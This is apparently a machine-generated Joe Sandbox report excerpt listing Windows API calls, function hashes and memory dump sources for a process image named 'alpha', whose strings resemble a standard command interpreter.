                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: COPYCMD$\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3989487059-1802776761
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 556f273b68658bad24ae4a657d5f77560e51f276d87fecf3366158a32f470c82
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89F1B266A09B4B81FB55AB11D4542BEB3A0FF45B98FC44036DA4F477B4EEBCE4858320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 55602301-2548490036
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 762cd0ca4af20a1155187169e38170c917da472260c7888e906569873f87654f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AA17F23A1864B96FB20AB10E4402BEA7A1FB44754FD40177EA4F876A4EFBCE555C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3935429995-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandlememset$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3260997497-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
• String ID: @P
Similarity
• API ID: memset$BufferConsoleInfoScreen
• String ID:
Similarity
• API ID: CloseValue$CreateDeleteOpen
• String ID: %s=%s$\Shell\Open\Command
APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AACF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB39
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB6F
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABA4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABCB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2429825313-3727491224
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4289998964-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3476366620-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2448137811-2100233843
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: _wcsicmp
• String ID: GeToken: (%x) '%s'
• API String ID: 2081463915-1994581435
APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: wcschr
• String ID:
• API String ID: 1497570035-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _pipe.MSVCRT ref: 00007FF7D1516C1E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1516CD1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7D1516CFB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 624391571-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4268342597-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: OpenToken$CloseProcessThread
• String ID:
• API String ID: 2991381754-0
APIs
• GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7D153C59E), ref: 00007FF7D1515879
  • Part of subcall function 00007FF7D15158D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1515903
  • Part of subcall function 00007FF7D15158D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1515943
  • Part of subcall function 00007FF7D15158D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D1515956
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: CloseOpenQueryValueVersion
• String ID: %d.%d.%05d.%d
• API String ID: 2996790148-3457777122
APIs
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: memset$ErrorFileFindFirstLast
• String ID:
• API String ID: 2831795651-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D1517DA1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D15241AD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D1517EB7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 168394030-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2149833895-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF7D1534227), ref: 00007FF7D1538678
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?,?,?,00000000,00007FF7D1534227), ref: 00007FF7D15386D4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$System$File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2838179519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT ref: 00007FF7D15185D4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3520273530-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7D151F52A,00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F8FB
